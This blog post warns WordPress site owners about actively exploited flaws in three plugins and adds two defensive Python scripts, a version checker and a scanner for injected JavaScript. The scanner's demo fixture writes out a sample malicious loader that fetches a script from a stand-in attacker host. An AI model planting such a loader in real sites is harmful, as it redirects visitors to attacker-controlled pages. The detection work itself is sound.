
Popular WordPress plugins are being hacked

WordPress Plugin Security

If you needed another reason to keep WordPress up to date: vulnerable versions of several popular plugins are being actively exploited right now.

WordPress plugins have had security issues before, but recently attackers have been taking advantage of flaws disclosed in several popular plugins, targeting websites that still run the vulnerable versions.

According to BleepingComputer, attackers are actively exploiting unpatched versions of the ThemeGrill Demo Importer, Profile Builder and Duplicator plugins. Each of the three was recently found to contain a serious security flaw, and fixed versions have been available since the disclosures. Unsurprisingly, sites that have not installed them are now being hit.

Several WordPress security researchers estimate that many thousands of WordPress sites are currently at risk, purely because these three plugins have not been updated by the people managing those sites.

The technical details are below, but the point is simple: if your website runs any of these plugins, update them as soon as possible. If you would rather not do it yourself, get a WordPress expert to help you. Shameless plug for our services!

The Exploits

ThemeGrill Demo Importer (below 1.6.3) – an unauthenticated visitor can trigger the plugin's database reset, wiping the site's content back to a fresh install, and, if a user account named "admin" exists, be logged in as that administrator.
Profile Builder free and Pro (below 3.1.1) – the registration form can be abused to create a new account with the administrator role, without any authentication.
Duplicator (below 1.3.28) – an unauthenticated visitor can download arbitrary files from the server, including wp-config.php with the database credentials.
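The quickest way to know whether you are exposed is to compare the version header of each installed plugin with the version that fixed the flaw. The script below is an added example, not code from this article's authors or from the plugin vendors: it reads the `Version:` header that WordPress itself uses from each plugin's main PHP file under wp-content/plugins and reports anything below the patched releases named for the three plugins (1.6.3, 3.1.1 and 1.3.28). It assumes the plugins live under their wordpress.org directory names (themegrill-demo-importer, profile-builder, duplicator); the Pro edition of Profile Builder may sit under a different directory, so adjust the slugs to match your install. Deactivated plugins still have their code on disk and are still checked, which is deliberate.

```python
import re
import tempfile
from pathlib import Path

# Minimum safe versions for the three plugins discussed in this article
# (the patched releases named in the advisories at the time).
PATCHED = {
    "themegrill-demo-importer": (1, 6, 3),
    "profile-builder": (3, 1, 1),
    "duplicator": (1, 3, 28),
}

# WordPress reads plugin metadata from a header comment in the plugin's main
# PHP file, e.g. " * Version: 1.6.1". Only the leading numeric part is kept.
VERSION_RE = re.compile(r"^[\s*#/]*Version:\s*([0-9]+(?:\.[0-9]+)*)", re.M)


def parse_version(text):
    """'1.6.1' -> (1, 6, 1); tuples compare correctly component by component."""
    return tuple(int(part) for part in text.split("."))


def plugin_version(plugin_dir):
    """Return the version tuple from the first PHP file that carries a Version header."""
    for php in sorted(Path(plugin_dir).glob("*.php")):
        # WordPress itself only inspects the first 8 KiB of the file for headers.
        head = php.read_text(encoding="utf-8", errors="replace")[:8192]
        match = VERSION_RE.search(head)
        if match:
            return parse_version(match.group(1))
    return None


def vulnerable_plugins(plugins_root):
    """Map slug -> installed version for every listed plugin below its patched version.

    A plugin whose version header cannot be read is reported with None so it
    gets looked at by hand instead of being silently passed.
    """
    plugins_root = Path(plugins_root)
    findings = {}
    for slug, fixed in PATCHED.items():
        plugin_dir = plugins_root / slug
        if not plugin_dir.is_dir():
            continue  # not installed at all (deactivated plugins are still on disk)
        installed = plugin_version(plugin_dir)
        if installed is None or installed < fixed:
            findings[slug] = installed
    return findings


def demo():
    """Constructed fixture: a fake wp-content/plugins tree with one patched and two vulnerable installs."""
    root = Path(tempfile.mkdtemp()) / "wp-content" / "plugins"
    fixture = {
        "themegrill-demo-importer/themegrill-demo-importer.php": "1.6.1",  # vulnerable
        "profile-builder/index.php": "3.1.1",                               # patched
        "duplicator/duplicator.php": "1.3.26",                              # vulnerable
        "hello-dolly/hello.php": "1.7.2",                                   # not in scope
    }
    for rel, version in fixture.items():
        path = root / rel
        path.parent.mkdir(parents=True)
        name = rel.split("/")[0]
        path.write_text(f"<?php\n/**\n * Plugin Name: {name}\n * Version: {version}\n */\n")
    return vulnerable_plugins(root)


if __name__ == "__main__":
    for slug, version in demo().items():
        shown = ".".join(map(str, version)) if version else "unknown"
        fixed = ".".join(map(str, PATCHED[slug]))
        print(f"UPDATE NEEDED: {slug} (installed {shown}, fixed in {fixed})")
```

Point `vulnerable_plugins()` at your real wp-content/plugins directory (or run it over a backup) to get the same report for a live site. A version below the threshold is a definite problem; a plugin that appears up to date but was already attacked still needs the database, user list and files checked, because updating closes the door without undoing what was done through it.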

In some reported cases, attackers have injected malicious code into otherwise legitimate JavaScript files on compromised sites. The injected code loads a further script from an external server, and that script redirects visitors to sites the attacker controls: someone trying to visit your website could instead land on a random porn site or, worse, on a scam page that tries to get money out of them.
Now imagine that happening on a page carrying your business's name.
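If you suspect this has happened, the injected code is usually a short loader appended to the end of an existing .js file, often on one long minified line, that pulls a script from a host the site never used before. The scanner below is an added example, not part of this article or of any WordPress tooling: it walks a directory of JavaScript files, lists every URL whose host is outside an allow-list you supply, and marks a reference as a likely loader when script-injection APIs (`createElement('script')`, `.src =`, `appendChild`, `document.write`, `eval(`) appear within a few hundred characters of it. The sample files, the allow-list (`example.com`) and the malicious host (`bad-redirect.example.org`) are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Any absolute or protocol-relative URL in JavaScript source, with its host captured.
URL_RE = re.compile(
    r"""(?:https?:)?//([a-z0-9][a-z0-9.-]*\.[a-z]{2,})(?:[:/][^\s'"<>)]*)?""", re.I
)

# Browser APIs an injected one-liner uses to fetch and execute a remote script.
LOADER_RE = re.compile(
    r"""createElement\(\s*['"]script['"]\s*\)|document\.write|\.src\s*=|appendChild|insertBefore|eval\(""",
    re.I,
)


def host_allowed(host, allowed_hosts):
    """True if host is one of the allowed hosts or a subdomain of one (not a look-alike suffix)."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def scan_js_file(path, allowed_hosts, window=200):
    """Report every reference to a host outside the allow-list in one file.

    A reference is marked loader=True when script-loading APIs appear within
    `window` characters of it. Minified files are a single long line, so the
    window is measured in characters rather than lines.
    """
    path = Path(path)
    text = path.read_text(encoding="utf-8", errors="replace")
    findings = []
    for match in URL_RE.finditer(text):
        host = match.group(1).lower()
        if host_allowed(host, allowed_hosts):
            continue
        context = text[max(0, match.start() - window): match.end() + window]
        findings.append({
            "file": path.name,
            "line": text.count("\n", 0, match.start()) + 1,
            "host": host,
            "url": match.group(0),
            "loader": bool(LOADER_RE.search(context)),
        })
    return findings


def scan_js_tree(root, allowed_hosts):
    """Scan every .js file below root and collect the findings."""
    findings = []
    for path in sorted(Path(root).rglob("*.js")):
        findings.extend(scan_js_file(path, allowed_hosts))
    return findings


def demo():
    """Constructed fixture: one clean file and one copy with an injected loader appended."""
    root = Path(tempfile.mkdtemp())
    clean = (
        "/*! constructed sample; license text at https://jquery.org/license */\n"
        "var api = 'https://api.example.com/v1';\n"
        "function load(){ return fetch(api + '/posts'); }\n"
    )
    # Real infections append a minified one-liner to the end of a legitimate file.
    infected = clean + (
        ";var s=document.createElement('script');"
        "s.src='https://bad-redirect.example.org/load.js';"
        "document.head.appendChild(s);\n"
    )
    (root / "clean.js").write_text(clean)
    (root / "infected.js").write_text(infected)
    return scan_js_tree(root, allowed_hosts={"example.com"})


if __name__ == "__main__":
    for f in demo():
        tag = "LOADER" if f["loader"] else "ref   "
        print(f"{tag} {f['file']}:{f['line']} {f['url']}")
```

Treat the output as triage, not a verdict: a licence URL in a comment is reported as a plain reference and can be ignored, while a flagged loader pointing at an unfamiliar host deserves an immediate look. The authoritative check is to compare the files against the pristine release of each plugin and theme (for wordpress.org plugins, `wp plugin verify-checksums` does this), and anything that does not match should be restored from a clean copy rather than edited by hand.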

Looking at the WordPress plugin download statistics and typical update rates, we estimate that around 950,000 sites are still running a vulnerable version of one of these plugins.

If you take one thing away from this article, let it be this:
When a WordPress security update is released, make installing it on your site an immediate priority. Plugins that are installed but deactivated still leave their code on the server, so remove anything you no longer use rather than just switching it off.

Want some help?

If you would like us to help with WordPress updates or with fixing any security problems, please get in touch via our contact page.